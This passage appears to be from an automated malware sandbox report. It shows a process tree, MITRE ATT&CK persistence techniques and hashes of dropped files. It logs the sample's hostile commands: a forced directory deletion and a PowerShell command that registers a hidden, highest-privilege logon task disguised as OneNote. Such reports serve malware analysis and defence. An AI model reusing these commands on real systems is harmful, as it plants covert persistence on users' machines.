- Modifies Internet Explorer settings
- Modifies registry class
PID:2480
-
-
C:\Windows\system32\unregmp2.exeC:\Windows\system32\unregmp2.exe /SetWMPAsDefault7⤵
- Drops file in Windows directory
- Modifies registry class
PID:3180
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c rmdir "c:\Windows \"/s /q5⤵PID:1792
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RoWare')5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3516
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote startup_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-SCV.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4204
-
-
-
-
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s CDPSvc1⤵PID:4868
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV1⤵PID:4692
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc1⤵PID:508
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s wlidsvc1⤵PID:4468
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
2Active Setup
1Registry Run Keys / Startup Folder
1Event Triggered Execution
1Component Object Model Hijacking
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5ad5cd538ca58cb28ede39c108acb5785
SHA11ae910026f3dbe90ed025e9e96ead2b5399be877
SHA256c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033
SHA512c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13
-
Filesize
1KB
MD550ede7a722da61c923943566716d04a7
SHA1c487c8973884b7881dc752f7dded6da0063284b2
SHA256872cfd31704018b30be0c62ad32e1780ef5f89ca99166966f8a9d9eddffb27a4
SHA512bb16ca2e083c6d72a5a5388158a122d3544a6065bde76000ea990e52807699ee75d371072bec1812e2ccf1db5da201975ff2ba9c6821a6d8b54f3315829cb64d
-
Filesize
399KB
MD5472de93de365167459958b7ce29f610e
SHA17a7ace619fbd8569c2982fb1fc44aa4b6040f351
SHA2565baff04fad6153b7debb8003997edf677cd677263af4ab9e95510e225401ccde
SHA51203fc1017200c386cbe36050f5014c644edd57864ba1f7b88e5ab497d616ba3ec658ee8d690efde5544fe3befe569f3365e4d64f3b276245967193527e3b17f6a
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
72KB
MD556d03e4218082266a9cdd8600537d891
SHA1c153719f971dcee8f6985d7c79f64fc88dd8663c
SHA256210d5714497505022aa068167f7ed5bb826abcf53cfe741c9860a2c8dce3f54a
SHA512f2c64a4dbab789635bf97b3d615fcc96dfe8c4094b67a464eb34bc84501eb7648e7fa692971e917c1ebfac0548187721ecc552aaad35767f8a40846d922613d3